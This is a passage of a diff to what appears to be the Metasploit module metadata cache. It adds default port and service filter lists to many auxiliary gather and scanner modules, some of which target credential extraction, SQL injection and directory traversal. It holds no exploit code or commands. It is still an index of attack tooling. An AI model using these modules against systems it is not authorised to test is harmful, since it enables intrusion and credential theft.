"http", + "https" + ], "targets": null, "mod_time": "2018-09-17 16:58:57 +0000", "path": "/modules/auxiliary/gather/http_pdf_authors.rb", @@ -10929,6 +14521,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/huawei_wifi_info.rb", @@ -10959,6 +14566,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb", @@ -10989,6 +14611,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/ibm_sametime_room_brute.rb", @@ -11019,6 +14656,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/ibm_sametime_version.rb", @@ -11050,6 +14702,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/ie_sandbox_findfiles.rb", @@ -11086,6 +14744,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/ie_uxss_injection.rb", @@ -11115,6 +14779,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/gather/impersonate_ssl.rb", @@ -11144,6 +14814,12 @@ "platform": "", "arch": "", "rport": 1099, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/java_rmi_registry.rb", @@ -11175,6 +14851,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/jenkins_cred_recovery.rb", @@ -11205,6 +14896,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb", @@ -11237,6 +14943,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/joomla_contenthistory_sqli.rb", @@ -11267,6 +14988,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/joomla_weblinks_sqli.rb", @@ -11296,6 +15032,12 @@ "platform": "", "arch": "", "rport": 88, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/gather/kerberos_enumusers.rb", @@ -11326,6 +15068,21 @@ "platform": "", "arch": "", "rport": "50001", + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/gather/konica_minolta_pwd_extract.rb", @@ -11358,6 +15115,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/lansweeper_collector.rb", @@ -11389,6 +15160,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/mantisbt_admin_sqli.rb", @@ -11420,6 +15206,21 @@ "platform": "", "arch": "", "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/mcafee_epo_xxe.rb", @@ -11449,6 +15250,12 @@ "platform": "", "arch": "", "rport": 11211, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/memcached_extractor.rb", @@ -11478,6 +15285,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb", @@ -11511,6 +15333,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/ms14_052_xmldom.rb", @@ -11540,6 +15368,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/mybb_db_fingerprint.rb", @@ -11569,6 +15412,12 @@ "platform": "", "arch": "", "rport": 5351, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/natpmp_external_address.rb", @@ -11604,6 +15453,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/netgear_password_disclosure.rb", @@ -11637,6 +15501,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-01-13 22:55:01 +0000", "path": "/modules/auxiliary/gather/nis_bootparamd_domain.rb", @@ -11667,6 +15537,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-01-13 22:55:01 +0000", "path": "/modules/auxiliary/gather/nis_ypserv_map.rb", @@ -11697,6 +15573,21 @@ "platform": "", "arch": "", "rport": 8980, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/opennms_xxe.rb", @@ -11729,8 +15620,23 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, - "mod_time": "2018-09-19 22:15:14 +0000", + "mod_time": "2018-09-27 12:31:04 +0000", "path": "/modules/auxiliary/gather/pimcore_creds_sqli.rb", "is_install_path": true, "ref_name": "gather/pimcore_creds_sqli", @@ -11738,6 +15644,9 @@ "post_auth": false, "default_credential": false, "notes": { + "SideEffects": [ + "ioc-in-logs" + ] } }, "auxiliary_gather/qnap_backtrace_admin_hash": { @@ -11761,6 +15670,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb", @@ -11792,6 +15716,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/safari_file_url_navigation.rb", @@ -11824,6 +15754,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-16 22:10:02 +0000", "path": "/modules/auxiliary/gather/samsung_browser_sop_bypass.rb", @@ -11853,6 +15789,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/search_email_collector.rb", @@ -11882,6 +15824,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-17 16:58:57 +0000", "path": "/modules/auxiliary/gather/searchengine_subdomains_collector.rb", @@ -11911,6 +15868,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/shodan_honeyscore.rb", @@ -11941,6 +15904,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/gather/shodan_search.rb", @@ -11970,6 +15948,21 @@ "platform": "Windows", "arch": "", "rport": 6161, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/gather/snare_registry.rb", @@ -11999,6 +15992,21 @@ "platform": "", "arch": "", "rport": 8787, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/solarwinds_orion_sqli.rb", @@ -12029,6 +16037,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-01-22 16:32:16 +0000", "path": "/modules/auxiliary/gather/ssllabs_scan.rb", @@ -12058,6 +16072,12 @@ "platform": "", "arch": "", "rport": 10333, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/gather/teamtalk_creds.rb", @@ -12090,6 +16110,12 @@ "platform": "", "arch": "", "rport": 9010, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/trackit_sql_domain_creds.rb", @@ -12125,6 +16151,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/vbulletin_vote_sqli.rb", @@ -12155,6 +16196,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb", @@ -12174,7 +16223,7 @@ "type": "auxiliary", "author": [ "James Golovich", - "Rob Carr " + "rastating" ], "description": "This module allows you to export Wordpress data (such as the database, plugins, themes,\n uploaded files, etc) via the All-in-One Migration plugin without authentication.", "references": [ @@ -12186,8 +16235,23 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/auxiliary/gather/wp_all_in_one_migration_export.rb", "is_install_path": true, "ref_name": "gather/wp_all_in_one_migration_export", @@ -12205,7 +16269,7 @@ "type": "auxiliary", "author": [ "James Hooker", - "Rob Carr " + "rastating" ], "description": "Due to lack of verification of a visitor's permissions, it is possible\n to execute the 'export.php' script included in the default installation of the\n Ultimate CSV Importer plugin and retrieve the full contents of the user table\n in the WordPress installation. This results in full disclosure of usernames,\n hashed passwords and email addresses for all users.", "references": [ @@ -12216,8 +16280,23 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb", "is_install_path": true, "ref_name": "gather/wp_ultimate_csv_importer_user_extract", @@ -12248,6 +16327,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb", @@ -12281,6 +16375,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/xbmc_traversal.rb", @@ -12311,6 +16420,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/xerox_pwd_extract.rb", @@ -12341,6 +16456,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb", @@ -12372,6 +16502,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/zabbix_toggleids_sqli.rb", @@ -12403,6 +16548,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/zoomeye_search.rb", @@ -12434,6 +16585,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/parser/unattend.rb", @@ -12466,6 +16623,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/pdf/foxit/authbypass.rb", @@ -12495,6 +16658,12 @@ "platform": "", "arch": "", "rport": 5009, + "autofilter_ports": [ + 5009 + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/acpp/login.rb", @@ -12525,6 +16694,12 @@ "platform": "", "arch": "", "rport": 548, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/afp/afp_login.rb", @@ -12554,6 +16729,12 @@ "platform": "", "arch": "", "rport": 548, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/afp/afp_server_info.rb", @@ -12585,6 +16766,12 @@ "platform": "", "arch": "", "rport": 7777, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb", @@ -12615,6 +16802,12 @@ "platform": "", "arch": "", "rport": 19, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/chargen/chargen_probe.rb", @@ -12644,6 +16837,21 @@ "platform": "", "arch": "", "rport": 5984, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-25 01:05:18 +0000", "path": "/modules/auxiliary/scanner/couchdb/couchdb_enum.rb", @@ -12673,6 +16881,21 @@ "platform": "", "arch": "", "rport": 5984, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/couchdb/couchdb_login.rb", @@ -12702,6 +16925,12 @@ "platform": "", "arch": "", "rport": 50000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/db2/db2_auth.rb", @@ -12731,6 +16960,12 @@ "platform": "", "arch": "", "rport": 50000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/db2/db2_version.rb", @@ -12760,6 +16995,12 @@ "platform": "", "arch": "", "rport": 523, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/db2/discovery.rb", @@ -12789,6 +17030,12 @@ "platform": "", "arch": "", "rport": 135, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb", @@ -12818,6 +17065,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-31 14:41:33 +0000", "path": "/modules/auxiliary/scanner/dcerpc/hidden.rb", @@ -12847,6 +17100,12 @@ "platform": "", "arch": "", "rport": 135, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dcerpc/management.rb", @@ -12876,6 +17135,12 @@ "platform": "", "arch": "", "rport": 135, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb", @@ -12906,6 +17171,12 @@ "platform": "", "arch": "", "rport": 5040, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb", @@ -12935,6 +17206,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dect/call_scanner.rb", @@ -12964,6 +17241,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dect/station_scanner.rb", @@ -12993,6 +17276,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-31 04:53:14 +0000", "path": "/modules/auxiliary/scanner/discovery/arp_sweep.rb", @@ -13022,6 +17311,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/discovery/empty_udp.rb", @@ -13051,6 +17346,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb", @@ -13080,6 +17381,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-31 04:53:14 +0000", "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb", @@ -13110,6 +17417,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-31 04:53:14 +0000", "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb", @@ -13139,6 +17452,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-05-31 14:32:31 +0000", "path": "/modules/auxiliary/scanner/discovery/udp_probe.rb", @@ -13168,6 +17487,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/discovery/udp_sweep.rb", @@ -13200,6 +17525,12 @@ "platform": "", "arch": "", "rport": 2067, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb", @@ -13230,6 +17561,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/dns/dns_amp.rb", @@ -13259,6 +17596,21 @@ "platform": "", "arch": "", "rport": 9200, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb", @@ -13288,6 +17640,12 @@ "platform": "", "arch": "", "rport": 3000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb", @@ -13317,6 +17675,12 @@ "platform": "", "arch": "", "rport": 3500, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb", @@ -13347,6 +17711,22 @@ "platform": "", "arch": "", "rport": 2379, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 2379 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-04-04 10:52:47 +0000", "path": "/modules/auxiliary/scanner/etcd/open_key_scanner.rb", @@ -13377,6 +17757,22 @@ "platform": "", "arch": "", "rport": 2379, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 2379 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-04-04 11:01:38 +0000", "path": "/modules/auxiliary/scanner/etcd/version.rb", @@ -13406,6 +17802,12 @@ "platform": "", "arch": "", "rport": 79, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-02-20 15:48:00 +0000", "path": "/modules/auxiliary/scanner/finger/finger_users.rb", @@ -13435,6 +17837,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/anonymous.rb", @@ -13467,6 +17876,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", @@ -13499,6 +17915,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-12-11 14:40:09 +0000", "path": "/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb", @@ -13528,6 +17951,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.rb", @@ -13557,6 +17987,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-12-14 08:05:57 +0000", "path": "/modules/auxiliary/scanner/ftp/ftp_login.rb", @@ -13586,6 +18023,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/ftp_version.rb", @@ -13620,6 +18064,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb", @@ -13652,6 +18103,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb", @@ -13684,6 +18142,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb", @@ -13713,6 +18178,12 @@ "platform": "", "arch": "", "rport": 70, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-20 09:44:07 +0000", "path": "/modules/auxiliary/scanner/gopher/gopher_gophermap.rb", @@ -13742,6 +18213,12 @@ "platform": "", "arch": "", "rport": 1720, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/h323/h323_version.rb", @@ -13773,6 +18250,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb", @@ -13803,6 +18295,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 